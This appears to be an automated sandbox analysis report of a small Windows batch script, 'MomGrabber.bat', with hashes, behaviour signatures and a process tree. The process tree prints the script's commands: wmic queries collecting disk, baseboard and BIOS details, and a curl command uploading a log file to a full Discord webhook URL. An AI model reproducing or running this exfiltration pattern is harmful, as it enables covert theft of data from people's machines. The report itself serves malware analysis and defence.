Analysis
-
max time kernel
139s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
12-08-2024 13:14
Static task
static1
Behavioral task
behavioral1
Sample
MomGrabber.bat
Resource
win7-20240729-en
windows7-x64
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
MomGrabber.bat
Resource
win10v2004-20240802-en
windows10-2004-x64
4 signatures
150 seconds
General
-
Target
MomGrabber.bat
-
Size
727B
-
MD5
8691d8696a4b87bab23b707f6c9a9fa7
-
SHA1
fc34c04ffd8ba2d8e4b4240fb5125bfe9ec8f455
-
SHA256
c372a7a932e36fe62d705e40061a72c8f7420188707c9317c88d149181cd4b03
-
SHA512
716ea20bd8f8f32fea0356742ea277ede9136df27fb893bf11551db781d03aa3de2c900b437d50b1081f99592bfbecab4b2a5d849d0a6e1608c7e78a68f028a9
Score
6/10
Malware Config
Signatures
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 discord.com 5 discord.com -
Delays execution with timeout.exe 1 IoCs
pid Process 3936 timeout.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 3872 WMIC.exe Token: SeSecurityPrivilege 3872 WMIC.exe Token: SeTakeOwnershipPrivilege 3872 WMIC.exe Token: SeLoadDriverPrivilege 3872 WMIC.exe Token: SeSystemProfilePrivilege 3872 WMIC.exe Token: SeSystemtimePrivilege 3872 WMIC.exe Token: SeProfSingleProcessPrivilege 3872 WMIC.exe Token: SeIncBasePriorityPrivilege 3872 WMIC.exe Token: SeCreatePagefilePrivilege 3872 WMIC.exe Token: SeBackupPrivilege 3872 WMIC.exe Token: SeRestorePrivilege 3872 WMIC.exe Token: SeShutdownPrivilege 3872 WMIC.exe Token: SeDebugPrivilege 3872 WMIC.exe Token: SeSystemEnvironmentPrivilege 3872 WMIC.exe Token: SeRemoteShutdownPrivilege 3872 WMIC.exe Token: SeUndockPrivilege 3872 WMIC.exe Token: SeManageVolumePrivilege 3872 WMIC.exe Token: 33 3872 WMIC.exe Token: 34 3872 WMIC.exe Token: 35 3872 WMIC.exe Token: 36 3872 WMIC.exe Token: SeIncreaseQuotaPrivilege 3872 WMIC.exe Token: SeSecurityPrivilege 3872 WMIC.exe Token: SeTakeOwnershipPrivilege 3872 WMIC.exe Token: SeLoadDriverPrivilege 3872 WMIC.exe Token: SeSystemProfilePrivilege 3872 WMIC.exe Token: SeSystemtimePrivilege 3872 WMIC.exe Token: SeProfSingleProcessPrivilege 3872 WMIC.exe Token: SeIncBasePriorityPrivilege 3872 WMIC.exe Token: SeCreatePagefilePrivilege 3872 WMIC.exe Token: SeBackupPrivilege 3872 WMIC.exe Token: SeRestorePrivilege 3872 WMIC.exe Token: SeShutdownPrivilege 3872 WMIC.exe Token: SeDebugPrivilege 3872 WMIC.exe Token: SeSystemEnvironmentPrivilege 3872 WMIC.exe Token: SeRemoteShutdownPrivilege 3872 WMIC.exe Token: SeUndockPrivilege 3872 WMIC.exe Token: SeManageVolumePrivilege 3872 WMIC.exe Token: 33 3872 WMIC.exe Token: 34 3872 WMIC.exe Token: 35 3872 WMIC.exe Token: 36 3872 WMIC.exe Token: SeIncreaseQuotaPrivilege 2504 WMIC.exe Token: SeSecurityPrivilege 2504 WMIC.exe Token: SeTakeOwnershipPrivilege 2504 WMIC.exe Token: SeLoadDriverPrivilege 2504 WMIC.exe Token: SeSystemProfilePrivilege 2504 WMIC.exe Token: SeSystemtimePrivilege 2504 WMIC.exe Token: SeProfSingleProcessPrivilege 2504 WMIC.exe Token: SeIncBasePriorityPrivilege 2504 WMIC.exe Token: SeCreatePagefilePrivilege 2504 WMIC.exe Token: SeBackupPrivilege 2504 WMIC.exe Token: SeRestorePrivilege 2504 WMIC.exe Token: SeShutdownPrivilege 2504 WMIC.exe Token: SeDebugPrivilege 2504 WMIC.exe Token: SeSystemEnvironmentPrivilege 2504 WMIC.exe Token: SeRemoteShutdownPrivilege 2504 WMIC.exe Token: SeUndockPrivilege 2504 WMIC.exe Token: SeManageVolumePrivilege 2504 WMIC.exe Token: 33 2504 WMIC.exe Token: 34 2504 WMIC.exe Token: 35 2504 WMIC.exe Token: 36 2504 WMIC.exe Token: SeIncreaseQuotaPrivilege 2504 WMIC.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 2380 wrote to memory of 3872 2380 cmd.exe 84 PID 2380 wrote to memory of 3872 2380 cmd.exe 84 PID 2380 wrote to memory of 2504 2380 cmd.exe 86 PID 2380 wrote to memory of 2504 2380 cmd.exe 86 PID 2380 wrote to memory of 2644 2380 cmd.exe 87 PID 2380 wrote to memory of 2644 2380 cmd.exe 87 PID 2380 wrote to memory of 4304 2380 cmd.exe 89 PID 2380 wrote to memory of 4304 2380 cmd.exe 89 PID 2380 wrote to memory of 3936 2380 cmd.exe 92 PID 2380 wrote to memory of 3936 2380 cmd.exe 92
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\MomGrabber.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get /format:list2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3872
-
-
C:\Windows\System32\Wbem\WMIC.exewmic baseboard get /format:list2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get /format:list2⤵PID:2644
-
-
C:\Windows\system32\curl.execurl -H "Content-Type: multipart/form-data" -F "file=@C:\Users\Admin\AppData\Local\Temp\22186-25730-25642.log" https://discord.com/api/webhooks/1255258727809024114/-QCsZFpQpBHxOspyB3JkzE8_amtIEhu33Ah6-9ogfXbIoIujLtJZrqWKK-2EBRcm_UZs2⤵PID:4304
-
-
C:\Windows\system32\timeout.exetimeout 1 /nobreak2⤵
- Delays execution with timeout.exe
PID:3936
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
276KB
MD56c0a823a01240be989c2b4eb5d54e0f2
SHA124253b6a85d05beaa32c45dbbcdb252a95a45e80
SHA2568424ef8abf3c08cd184703ac00359dbd595cc7bb506651b4990f56e4c9e2b9e3
SHA512105b1d57f72b17734bb3dc2a67f0694957ade3192730ef2a3d7c4be8a9a75da7d82c43bf7bb9fca156683efd888fd0dbfca56e8b1bb7e734f89cdca15ea477eb